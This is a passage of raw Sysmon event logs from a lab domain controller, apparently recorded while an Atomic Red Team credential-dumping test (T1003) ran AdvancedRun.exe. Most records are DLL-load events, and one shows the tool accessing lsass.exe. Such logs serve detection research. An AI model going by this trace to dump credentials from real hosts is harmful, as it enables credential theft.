\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.952{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 
(rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942508Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for 
WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 